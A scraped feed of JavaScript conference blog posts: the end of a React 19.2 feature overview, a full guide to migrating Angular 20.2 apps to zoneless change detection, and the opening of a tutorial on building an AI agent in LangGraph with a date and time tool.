The caveat to not having effects running in “hidden” mode is that any data fetching relying on running within an effect won’t be able to take advantage of the pre-rendering capabilities of the < Activity/> component. This includes, but not limited to, the useQuery hook from TanStack query, which uses a useEffect under the hood. To take advantage of this pattern with the commonly used TanStack query asynchronous state management libraries, which would also then cache the fetched data in-memory for further optimization and guarding against refetching non-stale data, you could make use of queryClient.prefetch.

const SIDEBAR_QUERY_KEY = 'sidebar';

function Sidebar() {
 const queryClient = useQueryClient()

 const data = use(queryClient.ensureQueryData({
   queryKey: [SIDEBAR_QUERY_KEY],
   queryFn: fetchSidebarData,
 }))

 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

An added benefit of pre-fetching with TanStack query here is that any other components subscribing to the same query key will benefit from the data having a warm cache ready to go.

The useEffectEvent Hook

If you’ve ever written a useEffect that connects to an external system, say a WebSocket, a stream, or a DOM event, you’ve probably had to battle the dependency array. The typical problem is that you want to react to something external, but the effect keeps re-running every time one of your props or state values changes. You either end up reconnecting too often or disabling the lint rule, which may leave you in the dark as the dependencies continue to grow and evolve.

Take this great example from the React Docs: you’re building a chat app, and when a user joins a new room, you want to show a notification once the connection is ready:

function ChatRoom({ roomId, theme }) {
 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => {
     showNotification('Connected!', theme);
   });
   connection.connect();
   return () => connection.disconnect();
 }, [roomId, theme]);
}

This looks fine, but there’s a subtle issue. If the user switches between light and dark themes while the chat is connected, the entire effect re-runs, disconnecting and reconnecting the socket, just to show the notification with the right color. It’s probably not what you were going for. The connection should only reset when roomId changes, not because of theming. What most would do in this case is remove the theme from the dependency array. However, that results in a linter warning, and you ultimately will have to disable it with a comment.

This is where useEffectEvent shines. It lets you separate the “event reaction” logic from the “effect setup” logic, so React can handle updates to values like theme without forcing a teardown and reconnect.

Here’s the same example rewritten:

function ChatRoom({ roomId, theme }) {
 const onConnected = useEffectEvent(() => {
   showNotification('Connected!', theme);
 });

 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => onConnected());
   connection.connect();
   return () => connection.disconnect();
 }, [roomId]); // ✅ Effect runs only when roomId changes
}

The key difference is that the onConnected callback always “sees” the latest theme, but the effect itself remains stable because the event handler’s identity never changes. React treats useEffectEvent callbacks as stable by design, meaning they don’t need to appear in dependency arrays.

This pattern is incredibly useful in real apps. Think about analytics events, WebSocket subscriptions, or integrations with browser APIs. You often need to respond to events (connection open, visibility change, playback start, etc.) without tearing down your entire effect tree every time an unrelated prop changes.

So if you’ve been in the habit of sprinkling eslint-disable-next-line react-hooks/exhaustive-deps above every useEffect that listens to external events, this new addition to React’s collection of hooks finally makes that unnecessary. Just make sure to upgrade your eslint-plugin-react-hooks to latest.

Improving cache management with cacheSignal in React Server Components

The cache() function, used exclusively with React Server Components (RSCs), allows you to memoize the results of data fetching or expensive computations across requests. Starting with React 19.2, the core library introduces a new companion API, cacheSignal(), to complement the existing cache() API and provide greater control over cache lifecycles.

In short, cacheSignal() gives you an AbortSignal that matches the cache’s lifetime. When the cache expires, the signal is aborted, so any ongoing operations like fetch() calls can be cancelled smoothly.

This idea isn’t new – using abort signals is a common practice on the client side, with fetch requests that occur within effects and abort signals that allow for the correct cleanup to occur so that when a component unmounts, there aren’t any wasted resources. Now it’s built into React’s cache and rendering system.

Here’s an example:

const getUser = cache(async (id: string) => {
 const signal = cacheSignal();

 const response = await fetch(`/users/${id}`, { signal });

 if (!response.ok) {
   throw new Error(`Failed to fetch user: ${response.status}`);
 }

 return response.json();
});

export async function UserProfile({ id }: { id: string }) {
 const user = await getUser(id);

 return (
   <section>
     <h2>{user.name}</h2>
     <p>{user.email}</p>
   </section>
 );
}

In this example:

  • getUser is wrapped in cache(), which deduplicates calls with the same arguments within React’s server cache scope.
  • Inside getUsercacheSignal() returns an AbortSignal that React will abort after rendering is conclusive. This occurs in one of three scenarios:
    • React has successfully completed rendering.
    • The render was aborted.
    • The render has failed.
  • Passing that signal to fetch() ensures that any pending network requests are immediately canceled if the render is aborted, fails, or completes.

While cacheSignal() currently only operates within the RSC environment and returns null on the client, in the official documentss, the React team has indicated plans to extend its availability to Client Components in future releases.

Performance profiling gets new powers

Chrome provides the ability to customize performance data via its extensibility API, which, with React 19.2, is finally being taken advantage of. Previously, the performance panel showed flame charts for JavaScript, layout, and paint events, but not what React was doing internally. You could see when the browser was busy, but not why.

The React DevTools Profiler, added in version 16.5, helped fill some gaps, but only from React’s point of view. It showed which components rendered, how long each render took, and what triggered them. This was useful for seeing what React did, but we were still missing info on when or how it worked with the browser. The Profiler was separate from the browser’s performance timeline, so you couldn’t match React’s scheduling with main-thread tasks or paint events.

This separation made it hard to understand concurrency and scheduling. For example, if interactions were slow, you couldn’t tell if React was blocked by the browser, yielding work, or just handling a low-priority update.

React 19.2

Figure 1: React Performance Tracks (Source)

React 19.2 changes this by adding React Performance Tracks to Chrome DevTools’ Performance panel. This bridges the gap between React’s scheduler and the browser’s timeline. Now, you can see React’s priorities, renders, and effects right next to standard performance data, giving you a clear view of how React works frame by frame.

The tracks are broken down into the Scheduler track and the Component track:

  • Scheduler: visualizes React’s internal priorities like blocking and transition updates, showing when work starts, pauses, and completes.
  • Components: shows which components are rendering or running effects.

What’s new with React DOM?

Partial Pre-rendering

Partial pre-rendering first came as an experimental feature in Next.js 14. And now, with React 19.2, it’s shipping as part of the react-dom package, bringing a new rendering model to React that allows you to combine the benefits of static and dynamic rendering.

This provides a new level of flexibility, combining the performance benefits of Static Site Generation (SSG), where an entire route is rendered to static HTML, with the freshness of Server-Side Rendering (SSR), which re-renders the page on each request.

In a nutshell, with Partial Pre-rendering:

  • React pre-renders as much of the page as possible ahead of time (the static shell).
  • The parts that depend on live data or user-specific information are left as “holes” (Suspense boundaries).
  • When a request arrives, React resumes rendering the postponed (dynamic) parts on the server from the saved state, then streams the completed output to the browser.

This can be great for use cases such as E-commerce product pages, where product details like the title, description, and images rarely change, whereas pricing, localization, and stock generally do. With partial pre-rendering, you can serve a cached static shell instantly from a CDN to ensure the initial UI renders quickly and is close to the end user. Then, you can resume rendering only the dynamic components, such as price and stock, when the request hits the server.

Wrapping up

Beyond the core library and DOM package updates, the React team sprinkled in a few updates around batching suspense boundaries, web stream support for Node, eslint-plugin-react-hooks, and more!

As of October 20, 2025, 66.8% of websites using React are still on the 2017 release, version 16, and 10.9% on version 18, according to W3Techs. There’s still some time before these features will hit scale on the majority of production-grade applications. But that doesn’t mean it’s not important to get familiarized with what’s possible and to learn the concepts early. Isn’t that the perfect excuse to play around with them in a side project?

The post React 19.2 Explained: Updates, Impact, and What to Watch For appeared first on International JavaScript Conference.

]]>
No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 https://javascript-conference.com/blog/angular-20-zoneless-mode-performance-migration-guide/ Thu, 09 Oct 2025 08:40:28 +0000 https://javascript-conference.com/?p=108437 Zone.js has been at the heart of Angular’s change detection since the beginning, but the framework is moving forward. With the introduction of zoneless mode and signals, Angular now supports a reactivity model that is simpler, faster, and more explicit. This article shows what changes when you drop Zone.js, how to refactor your app, and how to work effectively with the new change detection model. You'll see what breaks, what improves, and how to rethink your app's reactivity when Zone.js is no longer in control.

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
For years, Zone.js powered Angular’s “magic refresh,” keeping apps in sync without extra effort. It worked by patching async browser APIs and notifying Angular whenever something might have changed. While this made development smoother, it also came with trade-offs: unnecessary change detection cycles and debugging complexity. Now, Angular 20.2 marks a turning point. Zoneless mode is stable, opening the door to a leaner and more predictable way of building Angular apps.

What is Zone.js and How Does it Work?

Before we talk about going zoneless, let’s recall what Zone.js actually is and does. It’s a library that monkey-patches asynchronous browser APIs such as setTimeout, promises, DOM events, and HTTP requests. Each time one of these is completed, it notifies Angular that “something might have changed.” But Zone.js couldn’t provide details about what changed or where. As a result, Angular had to trigger change detection across the whole component tree to make sure the UI stayed in sync.

That trade-off defined much of the Angular developer experience. On the bright side, Zone.js made things feel almost magical, the UI updated automatically whenever async code finished, and you didn’t have to think about it. This simplicity was especially appealing in Angular’s early days, when developers could focus on building features instead of worrying about change detection triggers.

But the magic came with a price. Zone.js treated every async event as a possible change, which meant Angular often did more work than necessary. Over time, that extra overhead slowed apps down and made debugging harder.

For years, developers enjoyed the “magic” of Zone.js but also dealt with its drawbacks. Here is some good news: Angular has been evolving to eliminate this dependency, and with Angular 18, we see the first experimental steps toward a zoneless future.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Angular Zoneless – From Experimental to Stable

The idea of running Angular without Zone.js has been a long-awaited change in the framework’s evolution. Back in Angular 18, the team introduced the first experimental APIs for zoneless mode, which allowed us to explore a world where change detection was no longer tied to Zone.js patching every asynchronous operation in the browser.

With the release of Angular 20.2, these APIs became stable, and we can now confidently build production applications in zoneless mode. Instead of relying on Zone.js, we work with an explicit change detection model where updates are triggered by signals, template events, async pipes, and manual checks when necessary.

This naturally raises the next question: why should we go zoneless, and what do we actually gain by removing Zone.js from our applications?

Why go zoneless?

So why should we drop Zone.js now that we finally can? The main reasons come down to leaner applications, improved performance, and more predictable behavior.

Benefits of going zoneless

  • Reduced bundle size and faster initial load: Without Zone.js, the bundle shrinks by about 33 KB. That’s not huge on its own, but it translates directly into a faster initial load, since the browser no longer has to download and parse the library.

Initial bundle size with Zone.js

Figure 1: Initial bundle size with Zone.js

Initial bundle size in zoneless app

Figure 2: Initial bundle size in zoneless app

  • Better performance: Zone.js often triggered unnecessary change detection cycles, even when no data had changed. Zoneless mode removes that overhead. Change detection now runs only when it actually needs to, giving us more predictable and performant rendering.
  • Easier debugging: With Zone.js gone, stack traces are no longer wrapped in Zone-specific frames. You get a full, accurate stack trace that points exactly to where something happened. No more extra noise. This makes debugging and profiling significantly easier.
  • Full control over reactivity: In zoneless Angular, the developer explicitly decides when the UI should update. This is a major shift – instead of relying on Zone.js “magic,” you know exactly what triggers change detection and when it happens. That makes the app’s reactivity model both transparent and intentional.

Trade-offs to keep in mind

  • You may need to adjust your mental model. Without automatic change detection, you must adopt a more deliberate strategy for updating the UI. That means paying more attention to using signals, async pipes, or calling markForCheck when necessary.
  • Migration effort: migrating a large app can take time, especially if it’s heavily tied to Zone.js behaviors and doesn’t use signals and onPush change detection strategy.

Create a zoneless project

Starting a zoneless project is surprisingly simple. In Angular v20.2, you can enable zoneless mode directly when you are creating a new project using CLI:

Create zoneless project with zoneless flag

Figure 3: Create zoneless project with zoneless flag

If you skip the flag, the Angular CLI will ask you a question during project setup:

Create zoneless app - CLI zoneless question

Figure 4: Create zoneless app – CLI zoneless question

Select “Yes” and you will get a project fully Zone.js free!

Migration to zoneless

If you already have an Angular project and want to migrate to zoneless, the process takes a few steps:

  • In app.config.ts, swap: provideZoneChangeDetection({ eventCoalescing: true }) → provideZonelessChangeDetection()

Switch to zoneless provider in app.config.ts

Figure 5: Switch to zoneless provider in app.config.ts

  • Remove zone.js from angular.json build and test configs.

Remove zone.js from build config in angular.json

Figure 6: Remove zone.js from build config in angular.json

Remove zone.js and zone.js/testing from test config in angular.json

Figure 7: Remove zone.js and zone.js/testing from test config in angular.json

  • Delete imports: import zone.js and import zone.js/testing.
  • Uninstall Zone.js. Once nothing depends on it anymore, uninstall it.

Uninstall Zone.js

Figure 8: Uninstall Zone.js

  • Verify in the browser. Open your app in the browser, open the console, and type Zone. You should get an error: Zone is not defined. That confirms Zone.js has been fully removed.

Checking in the browser console if Zone.js is still available in the app

Figure 9: Checking in the browser console if Zone.js is still available in the app

How Change Detection Works Without Zone.js

Once Zone.js is gone, Angular no longer “guesses” when to refresh the UI. Instead, the framework listens to specific, intentional triggers that tell it exactly when change detection should run. So what are the actual triggers that make Angular run change detection without Zone.js?

Change detection triggers

  • Bound host or template event listeners
<button class="refill-button" (click)="refillRum()">Refill Barrel</button>

@HostListener('click')
  refillRum(): void {
    this.rumService.refillRum();
  }
  • Async pipe calls ChangeDetectorRef.markForCheck() under the hood whenever the observed value changes, ensuring your template reflects the new data.
@for(location of treasureLocations$ | async; track location.id) {
      <!—Treasure location content -->
}
  • Updating a signal used in a template
  • ComponentRef.setInput(): When you programmatically set an input on a dynamically created component, Angular marks that view as dirty and schedules change detection.
  • Manual call of ChangeDetectorRef.markForCheck(): While Angular handles change detection automatically in most cases, you can still force it with markForCheck(), ensuring Angular picks up changes it wouldn’t catch otherwise.

It’s important to understand that going zoneless doesn’t rewrite Angular’s change detection model from scratch. The two familiar strategies, Default and OnPush, are still in place, and their behavior hasn’t changed. What changed is when the change detection process starts.

  • Default strategy: With the default mode, Angular still walks the component tree from top to bottom, checking each view to see if updates are needed. Zoneless or not, this part works exactly the same.

Default change detection

Figure 10: Default change detection – Trigger change detection by click event

In Figure 10, we see a zoneless application’s component tree, where all components use the default change detection strategy. When a user clicks a button inside one of the child components, the click event triggers change detection.

In the next step (Figure 11), Angular marks the component where the click happened, together with all of its ancestors up to the root, as dirty. Then Angular runs the change detection process (Figure 12).

The key difference is only in how change detection is triggered. Zone.js used to fire it on every patched async operation, while zoneless relies on explicit triggers like user events, signals, or async pipe.

Finally, it’s worth clarifying that Angular never “re-rendered” components. That’s a common misconception. Angular simply checks bindings, and if a change is detected, it updates only the affected DOM nodes.

Default change detection - Mark View Dirty

Figure 11: Default change detection – Mark View Dirty

Default change detection - components checked

Figure 12: Default change detection – components checked

  • onPush strategy: With OnPush, Angular checks only those components that have been explicitly marked as dirty.

onPush change detection - trigger change detection by click event

Figure 13: onPush change detection – trigger change detection by click event

Let’s look at a mixed setup: some components use OnPush, others stick to the default strategy (Figure 13). A user clicks a button inside an OnPush component. Angular marks that component and its ancestors dirty, same as before (Figure 14).

onPush change detection - Mark View Dirty

Figure 14: onPush change detection – Mark View Dirty

But here’s the twist. With OnPush, Angular only checks components that are actually marked as dirty. If an OnPush component isn’t marked dirty, Angular skips it entirely, along with all of its children (Figure 15). In our case, the parent of the clicked component is OnPush and marked dirty, so Angular checks it, and because that parent has another child using the default strategy, that sibling gets checked as well.

onPush change detection - components checked

Figure 15: onPush change detection – components checked

  • Local change detection with OnPush + Signals: Imagine we have a component tree where all components use OnPush change detection and rely on signals in their templates (Figure 16).

"Local" change detection - onPush + signal change + async task

Figure 16: “Local” change detection – onPush + signal change + async task

When an asynchronous task triggers a change in a signal, this update does not mark all ancestors as dirty. Instead, only the component consuming that signal (the “consumer”) is tagged as dirty.

"Local" change detection - Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

Figure 17: “Local” change detection – Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

But what about its ancestors? Ancestors aren’t marked as dirty, but instead receive a special marker called HasChildViewsToRefresh (Figure 17). This marker tells Angular that the component itself is clean, but it has children that need to be refreshed.

During change detection, Angular starts traversal from the root, skipping any OnPush components that aren’t dirty. However, when it encounters a component with the HasChildViewsToRefresh flag, it knows to continue down into its subtree. In this way, Angular bypasses clean components and focuses only on the path that leads to the consumer of the changed signal, ensuring that updates are applied exactly where they are needed (Figure 18).

It’s important to note that this optimization only works if the signal update isn’t triggered by mechanisms that already mark components as dirty (for example, event listener). In that case, the ancestors will be marked both as dirty and with the HasChildViewsToRefresh flag, which means Angular will check them as well.

"Local" change detection - Angular runs check detection only in component where signal value changed

Figure 18: “Local” change detection – Angular runs check detection only in component where signal value changed

Summing up this section: a trigger starts the process, and the strategy decides its scope. Now it’s time to see what preparation is needed before going zoneless.

Preparing for Zoneless

If we want to go zoneless, we first need to prepare our apps. It’s not just about removing Zone.js, we also need to make sure our components know how to notify Angular about changes. In other words, we have to replace the “magic” that Zone.js gave us with explicit signals, async pipes, or markForCheck calls. Once that’s in place, the transition becomes smooth and more predictable.

The very first step is to switch all components to the OnPush change detection strategy. Why? Because it immediately reveals what will stop working once Zone.js is gone. By forcing Angular to update only when explicitly notified, we can clearly see which parts of the app rely on Zone.js magic, and fix them before the actual migration.

Let’s look at some examples to see the most common issues you’ll run into, and which solutions will continue to work just fine. All examples below are shown using Angular 20.2, since that’s the version where zoneless mode is stable and safe to adopt.

View of an example component showing ship crew members

Figure 19: View of an example component showing ship crew members

I’ll start with a simple example, a component that displays the ship crew. Initially, everything works fine, we fetch the crew list with an HTTP request, subscribe to it in the component, and assign the result to a crewMembers variable. The template shows the first loading message, and then the data.

Listing 1:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
    .pipe(
	finalize(() => this.isLoading = false),
      takeUntilDestroyed(this.destroyRef)
    )
    .subscribe(members => {
      this.crewMembers = members;
    });
  }
}

But once we switch the component to the OnPush change detection strategy, things suddenly break. Instead of the crew list, we keep seeing the “loading” state, even though the HTTP call has already completed. Why does this happen?

View of an example component with loading state, when onPush strategy was turned on

Figure 20: View of an example component with loading state, when onPush strategy was turned on

Previously, Zone.js automatically tracked async tasks, such as HTTP requests. When the request finished, it triggered change detection for us. Without Zone.js, nothing notifies Angular that the data has arrived, so the UI never updates.

At this point, we have to trigger change detection ourselves. One option is to inject ChangeDetectorRef and call markForCheck after updating crewMembers. You can use it if you have to, but there are usually better options.

Listing 2 – markForCheck:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);
  private changeDetector = inject(ChangeDetectorRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
    .pipe(
      finalize(() => this.isLoading = false),
      takeUntilDestroyed(this.destroyRef)
    )
    .subscribe(members => {
      this.crewMembers = members;
      this.changeDetector.markForCheck();
    });
  }

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(!isLoading) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>              
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

A much better approach is to use the async pipe. It eliminates the need for manual subscription logic in your component and guarantees that Angular updates the view whenever data changes.

Listing 3 – Async Pipe:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers$ = this.crewService.getCrewMembers();

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @let crewMembers = crewMembers$ | async;
  @if(crewMembers) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

We can also take advantage of toSignal. With it, we transform an observable into a signal inside our component. Whenever the observable emits a new value, the signal’s value is updated, and Angular reacts right away. Subscriptions are managed under the hood, so we avoid the extra boilerplate of manual unsubscribe logic. In the template, we just use our signal instead of the observable, but we have to call it with (), e.g., crewmember(), to get a signal’s value.

Listing 4 – Signals:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers = toSignal(this.crewService.getCrewMembers());

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crewMembers()) {
    <ul class="crew-list">
      @for(member of crewMembers(); track member.id) {
          <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading”>
      <span>Loading crew members...</span>
    </div>
  }
</div>

Beyond async pipes and signals, there’s also a new player: httpResource. It’s still experimental, but it already works seamlessly in a zoneless environment. Why? Because it doesn’t rely on Zone.js at all, it exposes its state through signals, making it a natural fit for the new change detection model.

Listing 5 – httpResource:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
 crew = httpResource<CrewMember[]>(() => `http://localhost:3000/crew`);

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crew.hasValue()) {
    <ul class="crew-list">
      @for(member of crew.value(); track member.id) {
    <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  }
  @if(crew.isLoading()) {
    <div class="loading ">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Another common pitfall comes from using setTimeout or setInterval. In a zoneless app, they no longer trigger change detection automatically. If your code relies on them, you’ll need to adjust it before migrating. Depending on the case, you can either call markForCheck to notify Angular manually or update a signal value directly. Just remember, for the signal update to refresh the UI, it has to be read in the template. If you’re working with an observable, ensure it’s consumed via the async pipe, so updates are picked up correctly.

Listing 6 – setInterval not triggering change detection in zoneless app:

rumStockValue = 100;

//some code

setInterval(() => {
      this.rumStockValue = this.simulateRumConsumption();
    }, 10000);

Listing 7 – setInterval with signal value change:

rumStockValue = signal(100);

//some code

setInterval(() => {
      this.rumStockValue.set(this.simulateRumConsumption());
    }, 10000);

Angular also gives us a safety net to verify that our app is truly zoneless-ready. With provideCheckNoChangesConfig({ exhaustive: true, interval: < milliseconds > }) to app.config.ts, we can enable a periodic debug check that ensures no state changes slip by unnoticed. If Angular detects a binding update that wouldn’t have been refreshed by zoneless change detection, it throws an ExpressionChangedAfterItHasBeenCheckedError. This helps us catch hidden dependencies on Zone.js before they become real issues in production.

Listing 8:

export const appConfig: ApplicationConfig = {
  providers: [
    provideBrowserGlobalErrorListeners(),
    provideZonelessChangeDetection(),
    provideCheckNoChangesConfig({exhaustive: true, interval: 1000}),
    provideRouter(routes),
    provideHttpClient(),
  ]
};

Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

Figure 21: Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

With this in place, we now have the full picture, how change detection behaves under different strategies, what pitfalls appear when removing Zone.js, and how tools like signals and the async pipe help us stay in control.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Conclusion: The End of an Era, the Start of Another

Zone.js has been part of Angular from the very beginning, bringing the “magic refresh” that automatically kept UIs in sync. For years, it simplified development and allowed developers to focus on building features instead of managing updates manually. But as applications grew larger and the web evolved, the hidden costs of that magic became harder to ignore: performance overhead, noisy debugging, compatibility issues, and extra complexity in testing.

That’s why the shift to zoneless marks an important milestone in Angular’s evolution. Developers can finally build apps without Zone.js, relying instead on signals, markForCheck, and OnPush-friendly patterns.

Zone.js was magic. Zoneless is mastery. With Angular 20.2, you can finally leave the overhead behind, build apps that are faster and easier to debug, and take full control of change detection. The future of Angular is zoneless. It’s time to join it.

References

  1. Angular documentation
  2. Angular Summer Update 2025

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
Build an AI Agent with JavaScript and LangGraph https://javascript-conference.com/blog/build-ai-agents-javascript-langgraph/ Wed, 17 Sep 2025 07:50:54 +0000 https://javascript-conference.com/?p=108401 Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
One thing in common between all the systems mentioned is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits–for example, preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library exists for both programming languages to implement AI applications in the form of chained modules. LangGraph, a library for modeling and implementing AI agents, comes from the same manufacturer. In this article, we use the JavaScript version of this library based on Node.js, which scores points with its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state contains information about the structure of the graph. It also stores the application’s variable data. The graph also has reducer functions that LangGraph can use to update the state.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way, but the model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('How late is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And how late is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

